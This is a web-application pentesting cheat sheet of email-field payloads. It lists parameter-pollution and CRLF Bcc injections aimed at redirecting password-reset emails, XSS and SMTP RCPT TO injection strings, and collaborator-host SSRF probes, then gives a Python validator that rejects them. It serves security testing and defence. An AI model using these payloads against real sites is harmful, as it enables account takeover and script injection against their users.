Email Address Forms

How to exploit login and forgotten password forms.

Email Address Form Payloads

The following payloads can be used when attempting to exploit an email address form.

Param Manipulation and CRLF Injection

Use these payloads to try to force the web application to send legitimate password reset emails (and similar messages) to an email address you control:

  • email=user@lol.com&test@test.com

  • email=user@lol.com%26test@test.com

  • email=user@lol.com;test@test.com

  • email=user@lol.com, test@test.com

  • {"email":"user@lol.com","test@test.com"}

  • {"email":["user@lol.com","test@test.com"]}

  • email=user@lol.com%0D%0ABcc:test@test.com

  • email=user@lol.com%0ABcc:test@test.com

  • email=user@lol.com%0DBcc:test@test.com

  • email=user@lol.com\r\nBcc:test@test.com

  • email=user@lol.com\nBcc:test@test.com

  • email=user@lol.com\rBcc:test@test.com

Other checks (XSS, SSRF, SMTP Manipulation)

Use these payloads (all of which are valid email addresses according to the RFC) to find other issues.

  • <svg/onload=alert('XSS')>@test.com

  • test@test(<svg/onload=alert('XSS')>).com

  • "<svg/onload=alert('XSS')>"@test.com

  • "test@gmail.com\r\nRCPT TO:<victim+"@test.com>

  • test@burpcollab.com

  • test@[burpcollab.com]
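As an added defender-side example (not part of the original cheat sheet), here is a Python validator that decodes a password-reset request the way a web server would and rejects every payload in both lists above: CR/LF in the value, extra recipients, a second parameter smuggled in with `&`, JSON arrays, and the comment, quoted-string and address-literal forms. The regex, the function names and the strict "one plain address, no unexpected parameters" policy are this example's own assumptions, not something the page specifies.

```python
import json
import re
from urllib.parse import parse_qs

# Allow-list for the one address a password-reset form will accept. Deliberately
# stricter than RFC 5322: no quoted local parts, comments, address literals or
# extra recipients. Send the mail to the address on file, not to this input.
_STRICT_EMAIL = re.compile(
    r"^[A-Za-z0-9._%+-]{1,64}@"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$"
)


def validate_reset_email(raw):
    """Return (ok, reason); only a str holding exactly one plain address passes."""
    if not isinstance(raw, str):
        return False, "not a string (JSON arrays/objects/missing value rejected)"
    if "\r" in raw or "\n" in raw:
        return False, "CR/LF present (mail header injection)"
    if any(sep in raw for sep in ",;& "):
        return False, "separator present (extra recipient)"
    if raw.count("@") != 1:
        return False, "must contain exactly one @"
    if not _STRICT_EMAIL.fullmatch(raw):
        return False, "not a plain dot-atom address"
    return True, "ok"


def check_reset_request(body, content_type="application/x-www-form-urlencoded"):
    """Validate a reset request body the way the server would decode it."""
    if content_type == "application/json":
        try:
            data = json.loads(body)
        except ValueError:
            return False, "malformed JSON"
        if not isinstance(data, dict):
            return False, "JSON body is not an object"
        params = {k: [v] for k, v in data.items()}
    else:
        # parse_qs splits parameters on '&' and percent-decodes values, so '%26'
        # and '%0D%0A' in the body arrive as a literal '&' and a CRLF inside 'email'.
        params = parse_qs(body, keep_blank_values=True)
    # Strict: 'email=user@lol.com&test@test.com' becomes a second parameter named
    # 'test@test.com'; reject unexpected parameters instead of silently ignoring them.
    extra = sorted(set(params) - {"email"})
    if extra:
        return False, "unexpected parameter(s): " + ", ".join(extra)
    return validate_reset_email(params.get("email", [None])[0])
```

The `reason` string is meant to be logged: a burst of "CR/LF present" or "unexpected parameter(s)" rejections on the reset endpoint is a useful detection signal on its own.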
